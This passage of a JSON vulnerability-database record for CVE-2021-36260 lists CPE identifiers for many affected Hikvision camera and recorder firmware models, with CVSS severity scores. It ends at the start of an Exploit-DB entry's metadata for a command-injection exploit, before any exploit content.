"cpe:/o:hikvision:ds-2cd2027g2-l\\(u\\)_firmware:-", 
"cpe:/o:hikvision:ds-7104ni-q1\\/4p_firmware:4.31.100", "cpe:/o:hikvision:ds-2cd3743g2-izs_firmware:-", "cpe:/o:hikvision:ds-2cd2066g2-iu\\/sl_firmware:-", "cpe:/o:hikvision:ds-2cd2586g2-i\\(s\\)_firmware:-", "cpe:/o:hikvision:ds-2td6267-100c4l\\/wy_firmware:-", "cpe:/o:hikvision:ds-2td6267-75c4l\\/wy_firmware:-", "cpe:/o:hikvision:ds-2cd2347g2-lsu\\/sl_firmware:-", "cpe:/o:hikvision:ds-2cd2387g2-l\\(u\\)_firmware:-", "cpe:/o:hikvision:ds-2cd3543g2-is_firmware:-", "cpe:/o:hikvision:ptz-n5225i-a_firmware:-", "cpe:/o:hikvision:ds-2cd2686g2-izsu\\/sl_firmware:-", "cpe:/o:hikvision:ds-2cd2027g2-lu\\/sl_firmware:-", "cpe:/o:hikvision:ds-2cd3356g2-is\\(u\\)_firmware:-", "cpe:/o:hikvision:ds-2df8225ih-ael_firmware:-", "cpe:/o:hikvision:ds-2dy9236i8x-a_firmware:-", "cpe:/o:hikvision:ds-2cd3726g2-izs_firmware:-", "cpe:/o:hikvision:ds-2cd2087g2-l\\(u\\)_firmware:-"], "id": "CVE-2021-36260", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-36260", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:o:hikvision:ds-2df8425ix-aelw\\(t5\\)_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:hikvision:ds-2df8242ix-aely\\(t3\\)_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:hikvision:ds-2cd3743g2-izs_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:hikvision:ds-2cd2066g2-i\\(u\\)_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:hikvision:ds-2cd3356g2-is\\(u\\)_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:hikvision:ids-2vs435-f840-ey\\(t3\\)_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:hikvision:ds-2df8225ix-ael\\(t3\\)_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:hikvision:ds-2df8236i5x-aelw_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:hikvision:ds-2cd3056g2iu\\/sl_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:hikvision:ds-2cd3756g2-izs_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:hikvision:ds-2df8242i5x-ael\\(t3\\)_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:hikvision:ds-2cd2043g2-i\\(u\\)_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:hikvision:ds-2df7225ix-aelw\\(t3\\)_firmware:-:*:*:*:*:*:*:*", 
"cpe:2.3:o:hikvision:ds-2cd3356g2-isu\\/sl_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:hikvision:ds-2td6266t-50h2l_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:hikvision:ds-2cd3026g2-is_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:hikvision:ds-2cd3356g2-is_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:hikvision:ds-2cd2386g2-i\\(u\\)_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:hikvision:ds-2df8225ix-aelw\\(t5\\)_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:hikvision:ds-7108ni-q1_firmware:4.31.100:*:*:*:*:*:*:*", "cpe:2.3:o:hikvision:ds-2cd3063g2-iu_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:hikvision:ds-2td8166-180ze2f\\/v2_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:hikvision:ds-2cd2686g2-izs_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:hikvision:ds-2cd2387g2-l\\(u\\)_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:hikvision:ds-2cd2383g2-i\\(u\\)_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:hikvision:ds-2df6a425x-ael\\(t3\\)_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:hikvision:ds-7616ni-q2_firmware:4.31.000:*:*:*:*:*:*:*", "cpe:2.3:o:hikvision:ds-2cd2583g2-i\\(s\\)_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:hikvision:ds-760ni-k1\\/4p_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:hikvision:ptz-n4225i-de_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:hikvision:ds-7104ni-q1\\/4p\\/m_firmware:4.31.100:*:*:*:*:*:*:*", "cpe:2.3:o:hikvision:ds-2dy9250izs-a\\(t5\\)_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:hikvision:ds-2cd3026g2-iu\\/sl_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:hikvision:ds-2df5225x-ae3\\(t3\\)_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:hikvision:ds-2dy9236i8x-a_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:hikvision:ds-2td4137-25\\/w_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:hikvision:ds-2cd2083g2-i\\(u\\)_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:hikvision:ds-2cd2027g2-lu\\/sl_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:hikvision:ds-2cd2186g2-isu_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:hikvision:ds-2cd2143g2-i\\(s\\)_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:hikvision:ds-2dy9236x-a\\(t3\\)_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:hikvision:ds-2df6a436x-aely\\(t5\\)_firmware:-:*:*:*:*:*:*:*", 
"cpe:2.3:o:hikvision:ds-2cd2663g2-izs_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:hikvision:ds-2cd2021g1-i\\(w\\)_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:hikvision:ds-2df8242i5x-aelw\\(t3\\)_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:hikvision:ds-2cd2527g2-ls_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:hikvision:ds-2df8a442nxs-ael\\(t5\\)_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:hikvision:ds-2df8225ih-ael_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:hikvision:ds-2df8a442ixs-ael\\(t5\\)_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:hikvision:ids-2vs435-f840-ey_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:hikvision:ds-2cd2347g2-l\\(u\\)_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:hikvision:ids-2sk8144ixs-d\\/j_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:hikvision:ds-2cd2027g2-l\\(u\\)_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:hikvision:ds-2cd2123g2-i\\(s\\)_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:hikvision:ds-2cd2147g2-l\\(su\\)_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:hikvision:ds-2td6267-75c4l\\/w_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:hikvision:ds-2cd2421g0-i\\(d\\)\\(w\\)_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:hikvision:ds-7608ni-k1\\/4g_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:hikvision:ds-2td1217b-6\\/pa_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:hikvision:ds-2cd2123g2-iu_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:hikvision:ds-2cd3586g2-is_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:hikvision:ds-2cd2121g0-i\\(w\\)\\(s\\)_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:hikvision:ds-7616ni-k1_firmware:4.31.000:*:*:*:*:*:*:*", "cpe:2.3:o:hikvision:ds-2td6266t-25h2l_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:hikvision:ds-2cd2347g2-lsu\\/sl_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:hikvision:ds-2cd2426g2-i_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:hikvision:ds-2df8242i5x-aelw\\(t5\\)_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:hikvision:ids-2pt9a144mxs-d\\/t2_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:hikvision:ds-2cd2626g2-izsu\\/sl_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:hikvision:ds-7608ni-q2\\/8p_firmware:4.31.000:*:*:*:*:*:*:*", 
"cpe:2.3:o:hikvision:ds-2df8425ix-ael\\(t3\\)_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:hikvision:ds-2td6267-100c4l\\/wy_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:hikvision:ds-2cd2343g2-i\\(u\\)_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:hikvision:ds-2df8442ixs-aelwy\\(t5\\)_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:hikvision:ds-2td8167-230zg2f\\/w_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:hikvision:ds-2cd2183g2-i\\(u\\)_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:hikvision:ds-2cd2327g2-l\\(u\\)_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:hikvision:ds-2df8250i8x-ael\\(t3\\)_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:hikvision:ds-2df8442ixs-aelw\\(t2\\)_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:hikvision:ds-2cd3156g2-is\\(u\\)_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:hikvision:ds-2df8a842ixs-ael\\(t5\\)_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:hikvision:ds-2cd2186g2-i\\(su\\)_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:hikvision:ds-2td6237-75c4l\\/w_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:hikvision:ptz-n2204i-de3_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:hikvision:ds-2cd2686g2-izsu\\/sl_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:hikvision:ds-2cd3523g2-is_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:hikvision:ds-2cd2323g2-i\\(u\\)_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:hikvision:ds-2td4167-25\\/w_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:hikvision:ds-2cd2066g2-iu\\/sl_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:hikvision:ds-2df8a442ixs-aely\\(t5\\)_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:hikvision:ds-2td8167-230zg2f\\/wy_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:hikvision:ds-2cd3726g2-izs_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:hikvision:ds-2cd2683g2-izs_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:hikvision:ds-2cd2063g2-i\\(u\\)_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:hikvision:ds-2cd3186g2-is\\(u\\)_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:hikvision:ds-2cd2121g1-i\\(w\\)_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:hikvision:ds-2td4166t-9_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:hikvision:ds-2cd3526g2-is_firmware:-:*:*:*:*:*:*:*", 
"cpe:2.3:o:hikvision:ds-7604ni-q1_firmware:4.31.000:*:*:*:*:*:*:*", "cpe:2.3:o:hikvision:ds-2cd2121g1_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:hikvision:ds-2cd2547g2-ls_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:hikvision:ds-2cd3126g2-is\\(u\\)_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:hikvision:ds-7104ni-q1_firmware:4.31.100:*:*:*:*:*:*:*", "cpe:2.3:o:hikvision:ds-2cd3023g2-iu_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:hikvision:ds-2df5225x-ael\\(t3\\)_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:hikvision:ds-2cd2386g2-isu\\/sl_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:hikvision:ds-2df6a825x-ael_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:hikvision:ds-2cd2586g2-i\\(s\\)_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:hikvision:ds-2cd2621g0-i\\(z\\)\\(s\\)_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:hikvision:ds-2cd3056g2-iu\\/sl_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:hikvision:ds-2cd2346g2-isu\\/sl_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:hikvision:ds-7104ni-q1\\/4p_firmware:4.31.100:*:*:*:*:*:*:*", "cpe:2.3:o:hikvision:ds-7104ni-q1\\/m_firmware:4.31.100:*:*:*:*:*:*:*", "cpe:2.3:o:hikvision:ds-2cd2166g2-i\\(su\\)_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:hikvision:ds-2cd2121g1-idw_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:hikvision:ds-2cd3556g2-is_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:hikvision:ds-2cd3343g2-iu_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:hikvision:ds-2cd3386g2-is_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:hikvision:ds-2df7225ix-ael\\(t3\\)_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:hikvision:ds-2td6237-50h4l\\/w_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:hikvision:ds-2cd2087g2-l\\(u\\)_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:hikvision:ds-2cd2127g2-\\(-su\\)_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:hikvision:ds-2td8167-150zc4f\\/w_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:hikvision:ds-2xe6482f-izhrs_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:hikvision:ds-2cd3123g2-i\\(s\\)u_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:hikvision:ptz-n2404i-de3_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:hikvision:ds-2cd3563g2-is_firmware:-:*:*:*:*:*:*:*", 
"cpe:2.3:o:hikvision:ds-2df6a225x-ael\\)t3\\)_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:hikvision:ds-2td6267-100c4l\\/w_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:hikvision:ds-2df6a836x-ael\\(t5\\)_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:hikvision:ds-2cd2547g2-lzs_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:hikvision:ds-2df6a236x-ael\\(t3\\)_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:hikvision:ds-7604ni-k1_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:hikvision:ds-7616ni-q2\\/16p_firmware:4.31.000:*:*:*:*:*:*:*", "cpe:2.3:o:hikvision:ds-2cd3056g2-is_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:hikvision:ds-7608ni-k1_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:hikvision:ds-2cd3143g2-i\\(s\\)u_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:hikvision:ds-2cd2546g2-i\\(s\\)_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:hikvision:ptz-n4215i-de_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:hikvision:ids-2sk718mxs-d_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:hikvision:ds-2td1217b-3\\/pa_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:hikvision:ds-7108ni-q1\\/8p\\/m_firmware:4.31.100:*:*:*:*:*:*:*", "cpe:2.3:o:hikvision:ds-2cd3626g2-izs_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:hikvision:ds-2cd2366g2-i\\(u\\)_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:hikvision:ds-2cd2446g2-i_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:hikvision:ds-2cd2023g2-i\\(u\\)_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:hikvision:ds-2cd2643g2-izs_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:hikvision:ds-2cd2743g2-izs_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:hikvision:ds-2df8436i5x-aelw\\(t3\\)_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:hikvision:ds-2dy9236ix-a\\(t3\\)_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:hikvision:ds-2cd2047g2-l\\(u\\)_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:hikvision:ds-2cd3326g2-isu\\/sl_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:hikvision:ds-2cd2143g2-iu_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:hikvision:ds-2cd3763g2-izs_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:hikvision:ds-2df5232x-ae3\\)t3\\)_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:hikvision:ds-2cd2366g2-isu\\/sl_firmware:-:*:*:*:*:*:*:*", 
"cpe:2.3:o:hikvision:ds-7604ni-k1\\/4p\\/4g_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:hikvision:ds-2td1117-2\\/pa_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:hikvision:ds-2df8a442ixs-ael\\(t2\\)_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:hikvision:ds-2df8225ix-ael\\(t5\\)_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:hikvision:ds-2cd3547g2-ls_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:hikvision:ds-2td4136t-9_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:hikvision:ds-2cd2623g2-izs_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:hikvision:ds-2cd2421g0-i\\(d\\)w_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:hikvision:ds-2td8166-100c2f\\/v2_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:hikvision:ds-7616ni-q1_firmware:4.31.000:*:*:*:*:*:*:*", "cpe:2.3:o:hikvision:ds-2cd2646g2-izsu\\/sl_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:hikvision:ds-2td4137-50\\/w_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:hikvision:ds-2cd3723g2-izs_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:hikvision:ds-2cd2326g2-isu\\/sl_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:hikvision:ds-2cd2766g2-izs_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:hikvision:ds-2dyh2a0ixs-d\\(t2\\)_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:hikvision:ds-2df8442ixs-ael\\(t5\\)_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:hikvision:ds-2cd3386g2-is\\(u\\)_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:hikvision:ds-2cd2786g2-izs_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:hikvision:ds-2df8425ix-aelw\\(t3\\)_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:hikvision:ds-2df8225ix-aelw\\(t3\\)_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:hikvision:ds-2cd3347g2-ls\\(u\\)_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:hikvision:ds-2cd2721g0-i\\(z\\)\\(s\\)_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:hikvision:ds-2td8166-150zh2f\\/v2_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:hikvision:ds-2cd2163g2-iu_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:hikvision:ds-2df7232ix-ael\\(t3\\)_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:hikvision:ds-7608ni-q1\\/8p_firmware:4.31.000:*:*:*:*:*:*:*", "cpe:2.3:o:hikvision:ds-2cd2723g2-izs_firmware:-:*:*:*:*:*:*:*", 
"cpe:2.3:o:hikvision:ds-7108ni-q1\\/8p_firmware:4.31.100:*:*:*:*:*:*:*", "cpe:2.3:o:hikvision:ds-2cd2086g2-i\\(u\\)_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:hikvision:ds-2cd3363g2-iu_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:hikvision:ds-2df8242ix-ael\\(t5\\)_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:hikvision:ds-2cd2183g2-iu_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:hikvision:ds-2df8442ixs-aelw\\(t5\\)_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:hikvision:ds-2cd2183g2-i\\(s\\)_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:hikvision:ds-2dy92500x-a\\(t5\\)_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:hikvision:ds-2df6a436x-ael\\(t5\\)_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:hikvision:ds-2cd3643g2-izs_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:hikvision:ds-2cd3043g2-iu_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:hikvision:ds-2cd3126g2-is_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:hikvision:ds-2cd2543g2-i\\(ws\\)_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:hikvision:ds-2df8425ix-ael\\(t5\\)_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:hikvision:ds-2cd2526g2-is_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:hikvision:ds-2cd2563g2-i\\(s\\)_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:hikvision:ds-2td1117-3\\/pa_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:hikvision:ds-2cd2523g2-i\\(s\\)_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:hikvision:ds-2dy9236i8x-a\\(t3\\)_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:hikvision:ds-7604ni-q1\\/4p_firmware:4.31.000:*:*:*:*:*:*:*", "cpe:2.3:o:hikvision:ds-2cd2086g2-iu\\/sl_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:hikvision:ds-2xe6422fwd-izhrs_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:hikvision:ds-2cd2163g2-i\\(s\\)_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:hikvision:ds-2df8a442ixs-af\\/sp\\(t5\\)_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:hikvision:ds-2cd3786g2-izs_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:hikvision:ds-2cd2046g2-iu\\/sl_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:hikvision:ds-2cd3086g2-is_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:hikvision:ds-7608ni-k1\\/8p_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:hikvision:ds-2cd3156g2-is_firmware:-:*:*:*:*:*:*:*", 
"cpe:2.3:o:hikvision:ds-2cd2566g2-i\\(s\\)_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:hikvision:ds-2td6267-50h4l\\/w_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:hikvision:ds-2cd2523g2-i\\(u\\)_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:hikvision:ds-2cd3163g2-i\\(s\\)u_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:hikvision:ds-2df6a436x-ael\\(t3\\)_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:hikvision:ds-2cd3047g2-ls_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:hikvision:ds-2cd3323g2-iu_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:hikvision:ds-2df8442ixs-aely\\(t5\\)_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:hikvision:ds-2xe6442f-izhrs\\(b\\)_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:hikvision:ds-2td6267-75c4l\\/wy_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:hikvision:ds-2cd2321g0-i\\/nf_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:hikvision:ds-2cd2363g2-i\\(u\\)_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:hikvision:ds-2td8167-190ze2f\\/w_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:hikvision:ds-7608ni-q2_firmware:4.31.000:*:*:*:*:*:*:*", "cpe:2.3:o:hikvision:ds-2td8166-150ze2f\\/v2_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:hikvision:ds-2df8242ix-aelw\\(t3\\)_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:hikvision:ds-2cd3663g2-izs_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:hikvision:ds-2dy9240ix-a\\(t5\\)_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:hikvision:ds-2cd2783g2-izs_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:hikvision:ds-2cd3656g2-izs_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:hikvision:ds-2cd2666g2-izsu\\/sl_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:hikvision:ds-2df8225ih-ael\\(w\\)_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:hikvision:ds-2cd2763g2-izs_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:hikvision:ds-2xe6242f-is\\/316l\\(b\\)_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:hikvision:ptz-n4215-de3_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:hikvision:ds-2xe6452f-izh\\(r\\)s_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:hikvision:ds-2df7232ix-aelw\\(t3\\)_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:hikvision:ds-2td1117-6\\/pa_firmware:-:*:*:*:*:*:*:*", 
"cpe:2.3:o:hikvision:ds-2df5232x-ael\\(t3\\)_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:hikvision:ds-2cd3623g2-izs_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:hikvision:ds-2td4167-50\\/w_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:hikvision:ds-7608ni-k1\\/8p\\/4g_firmware:4.31.000:*:*:*:*:*:*:*", "cpe:2.3:o:hikvision:ds-2cd2666g2-izs_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:hikvision:ds-7608ni-q1_firmware:4.31.000:*:*:*:*:*:*:*", "cpe:2.3:o:hikvision:ds-2cd2526g2-i\\(s\\)_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:hikvision:ds-2td6236t-50h2l_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:hikvision:ds-7108ni-q1\\/m_firmware:4.31.100:*:*:*:*:*:*:*", "cpe:2.3:o:hikvision:ds-2cd3543g2-is_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:hikvision:ds-2cd2026g2-iu\\/sl_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:hikvision:ds-2td8167-190ze2f\\/wy_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:hikvision:ptz-n5225i-a_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:hikvision:ds-2td8166-75c2f\\/v2_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:hikvision:ds-2cd3686g2-izs_firmware:-:*:*:*:*:*:*:*"]}], "exploitdb": [{"lastseen": "2022-01-13T05:28:16", "description": "", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-10-25T00:00:00", "type": "exploitdb", "title": "Hikvision Web Server Build 210702 - Command Injection", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, 